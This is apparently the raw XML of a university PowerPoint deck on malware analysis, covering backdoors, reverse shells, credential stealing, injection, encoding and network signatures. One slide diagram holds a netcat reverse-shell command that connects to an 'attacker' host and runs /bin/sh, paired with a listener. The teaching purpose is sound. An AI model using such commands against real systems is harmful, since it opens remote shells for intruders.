          </a:solidFill>
          <a:ln w="25560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2452" rIns="81639" bIns="42452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500" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall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070241" y="6008311"/>
            <a:ext cx="3816000" cy="33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1473" tIns="42452" rIns="41473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</a:pPr>
            <a:r>
              <a:rPr lang="en-US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 attacker 8888 –e /bin/sh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25440" y="6008311"/>
            <a:ext cx="1880640" cy="34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1473" tIns="42452" rIns="41473" bIns="42452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 hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" alt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nc –l –p 8888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086241" y="4026662"/>
            <a:ext cx="1465920" cy="1566885"/>
            <a:chOff x="4921" y="2796"/>
            <a:chExt cx="1018" cy="1088"/>
          </a:xfrm>
        </p:grpSpPr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" y="2796"/>
              <a:ext cx="1018" cy="8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4995" y="3613"/>
              <a:ext cx="913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 marL="533400" indent="-514350"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1pPr>
              <a:lvl2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2pPr>
              <a:lvl3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3pPr>
              <a:lvl4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4pPr>
              <a:lvl5pPr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5pPr>
              <a:lvl6pPr marL="25146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6pPr>
              <a:lvl7pPr marL="29718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7pPr>
              <a:lvl8pPr marL="34290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8pPr>
              <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="45720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533400" algn="l"/>
                  <a:tab pos="990600" algn="l"/>
                  <a:tab pos="1447800" algn="l"/>
                  <a:tab pos="1905000" algn="l"/>
                  <a:tab pos="2362200" algn="l"/>
                  <a:tab pos="2819400" algn="l"/>
                  <a:tab pos="3276600" algn="l"/>
                  <a:tab pos="3733800" algn="l"/>
                  <a:tab pos="4191000" algn="l"/>
                  <a:tab pos="4648200" algn="l"/>
                  <a:tab pos="5105400" algn="l"/>
                  <a:tab pos="5562600" algn="l"/>
                  <a:tab pos="6019800" algn="l"/>
                  <a:tab pos="6477000" algn="l"/>
                  <a:tab pos="6934200" algn="l"/>
                  <a:tab pos="7391400" algn="l"/>
                  <a:tab pos="7848600" algn="l"/>
                  <a:tab pos="8305800" algn="l"/>
                  <a:tab pos="8763000" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9677400" algn="l"/>
                </a:tabLst>
                <a:defRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial Unicode MS" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="99000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="907"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1500" b="1">
                  <a:solidFill>
                    <a:srgbClr val="00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Victim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34586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87400"/>
            <a:ext cx="8410575" cy="623887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4.  Combining Dynamic and Static Analysis Techniques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716087"/>
            <a:ext cx="8382000" cy="498951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Steganography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers mimicking typical web requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoding commands in URLs and HTTP headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoding commands in meta-data of web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware circumventing intrusion detection filters similar to Tor circumventing censorship filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="290885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410575" cy="623887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4.  Combining Dynamic and Static Analysis Techniques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87487"/>
            <a:ext cx="8382000" cy="4989513"/>
          </a:xfrm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Behavioral analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>networking code to develop signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>WinSock API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WSAStartup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getaddrinfo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socket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connect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recv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WSAGetLastError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WinINet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> API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InternetOpen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InternetConnect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InternetOpenURL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InternetReadFile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InternetWriteFile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HTTPOpenRequest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HTTPQueryInfo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HTTPSendRequest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COM interface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URLDownloadToFile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CoInitialize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CoCreateInstance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Navigate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Finding hard-coded patterns or stable content to create rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Reverse-engineering encoding or decoding scheme allows for accurate network signature generation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0885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47713"/>
            <a:ext cx="8410575" cy="623887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>5.  Understanding the Attacker’s Perspective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411287"/>
            <a:ext cx="8382000" cy="4989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Attackers will mutate payloads to avoid detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Focus on elements that are part of both endpoints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Focus on elements of protocol known to be part of a key (see above)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Operate at a level that is different than other defenders (so that an attacker side-stepping another filter will not affect yours)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Defense-in-depth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470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Lab 14-1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2977554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 design template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design template</Template>
  <TotalTime>4349</TotalTime>
  <Words>5193</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1028</Paragraphs>
  <Slides>93</Slides>
  <Notes>86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Blends design template</vt:lpstr>
      <vt:lpstr>Part 4: Malware Functionality</vt:lpstr>
      <vt:lpstr>Chapter 11: Malware Behavior</vt:lpstr>
      <vt:lpstr>Common functionality</vt:lpstr>
      <vt:lpstr>1.  Downloaders</vt:lpstr>
      <vt:lpstr>2. Backdoor</vt:lpstr>
      <vt:lpstr>netcat</vt:lpstr>
      <vt:lpstr>netcat</vt:lpstr>
      <vt:lpstr>Issues with firewalls and NAT</vt:lpstr>
      <vt:lpstr>Shoveling a shell</vt:lpstr>
      <vt:lpstr>But…</vt:lpstr>
      <vt:lpstr>Windows reverse shells</vt:lpstr>
      <vt:lpstr>Remote access tools</vt:lpstr>
      <vt:lpstr>3.  Credential Stealers</vt:lpstr>
      <vt:lpstr>Monitoring user login</vt:lpstr>
      <vt:lpstr>Example: GINA interception</vt:lpstr>
      <vt:lpstr>Dumping credentials</vt:lpstr>
      <vt:lpstr>Example: lsass dumping</vt:lpstr>
      <vt:lpstr>Mimikatz</vt:lpstr>
      <vt:lpstr>Logging keystrokes</vt:lpstr>
      <vt:lpstr>4.  Privilege escalation</vt:lpstr>
      <vt:lpstr>Example: SeDebugPrivilege</vt:lpstr>
      <vt:lpstr>5.  Covering tracks – rootkits</vt:lpstr>
      <vt:lpstr>Some rootkit functions</vt:lpstr>
      <vt:lpstr>Function hooking</vt:lpstr>
      <vt:lpstr>Function hooking</vt:lpstr>
      <vt:lpstr>Function table hooking (IAT)</vt:lpstr>
      <vt:lpstr>IAT hooking</vt:lpstr>
      <vt:lpstr>IAT hooking</vt:lpstr>
      <vt:lpstr>IAT hooking</vt:lpstr>
      <vt:lpstr>Example IAT targets</vt:lpstr>
      <vt:lpstr>Example library hook</vt:lpstr>
      <vt:lpstr>Library hooks in Linux</vt:lpstr>
      <vt:lpstr>Slide 33</vt:lpstr>
      <vt:lpstr>Hot-patching invocation (Detours)</vt:lpstr>
      <vt:lpstr>Mechanism</vt:lpstr>
      <vt:lpstr>Detour details</vt:lpstr>
      <vt:lpstr>Detour details</vt:lpstr>
      <vt:lpstr>Detour details</vt:lpstr>
      <vt:lpstr>Malware and detours</vt:lpstr>
      <vt:lpstr>Detour example</vt:lpstr>
      <vt:lpstr>Mac OS</vt:lpstr>
      <vt:lpstr>6.  Persistence mechanisms</vt:lpstr>
      <vt:lpstr>Windows registry persistence</vt:lpstr>
      <vt:lpstr>Windows registry persistence</vt:lpstr>
      <vt:lpstr>Trojaning</vt:lpstr>
      <vt:lpstr>Trojaning using the ELF header</vt:lpstr>
      <vt:lpstr>Trojaning DLLs</vt:lpstr>
      <vt:lpstr>Trojaning DLLs</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Trojaning DLLs</vt:lpstr>
      <vt:lpstr>In-class exercise</vt:lpstr>
      <vt:lpstr>Chapter 12: Covert Malware Launching</vt:lpstr>
      <vt:lpstr>Covert Launching Methods</vt:lpstr>
      <vt:lpstr>1.  Launchers</vt:lpstr>
      <vt:lpstr>2.  Process injection</vt:lpstr>
      <vt:lpstr>DLL injection</vt:lpstr>
      <vt:lpstr>DLL injection into running process</vt:lpstr>
      <vt:lpstr>DLL injection</vt:lpstr>
      <vt:lpstr>DLL injection</vt:lpstr>
      <vt:lpstr>DLL injection</vt:lpstr>
      <vt:lpstr>Code cave example</vt:lpstr>
      <vt:lpstr>Direct code injection</vt:lpstr>
      <vt:lpstr>3.  Process replacement</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>4.  Hook injection</vt:lpstr>
      <vt:lpstr>Hook examples</vt:lpstr>
      <vt:lpstr>5.  Detours</vt:lpstr>
      <vt:lpstr>6.  APC injection</vt:lpstr>
      <vt:lpstr>APC injection from user space</vt:lpstr>
      <vt:lpstr>APC injection from kernel space</vt:lpstr>
      <vt:lpstr>In-class exercise</vt:lpstr>
      <vt:lpstr>Chapter 13: Data Encoding</vt:lpstr>
      <vt:lpstr>Data Encoding</vt:lpstr>
      <vt:lpstr>Data Encoding methods</vt:lpstr>
      <vt:lpstr>1. Simple ciphers</vt:lpstr>
      <vt:lpstr>Simple ciphers</vt:lpstr>
      <vt:lpstr>Simple ciphers</vt:lpstr>
      <vt:lpstr>2. Cryptographic ciphers</vt:lpstr>
      <vt:lpstr>Cryptographic ciphers</vt:lpstr>
      <vt:lpstr>3. Custom encoding</vt:lpstr>
      <vt:lpstr>4. Decoding</vt:lpstr>
      <vt:lpstr>In-class exercise</vt:lpstr>
      <vt:lpstr>Chapter 14: Malware-Focused Network Signatures</vt:lpstr>
      <vt:lpstr>Networking and Malware</vt:lpstr>
      <vt:lpstr>1.  Network Countermeasures</vt:lpstr>
      <vt:lpstr>Network Countermeasures</vt:lpstr>
      <vt:lpstr>2.  Safely Investigating an Attacker Online </vt:lpstr>
      <vt:lpstr>3.  Content-Based Network Counter-Measures</vt:lpstr>
      <vt:lpstr>4.  Combining Dynamic and Static Analysis Techniques</vt:lpstr>
      <vt:lpstr>4.  Combining Dynamic and Static Analysis Techniques</vt:lpstr>
      <vt:lpstr>5.  Understanding the Attacker’s Perspective</vt:lpstr>
      <vt:lpstr>In-class exercise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Finish setup</dc:title>
  <dc:creator>wuchang</dc:creator>
  <cp:lastModifiedBy>user</cp:lastModifiedBy>
  <cp:revision>121</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-08T03:36:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-14T18:56:17Z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TC102037591033</vt:lpwstr>
  </property>
</Properties>
</file>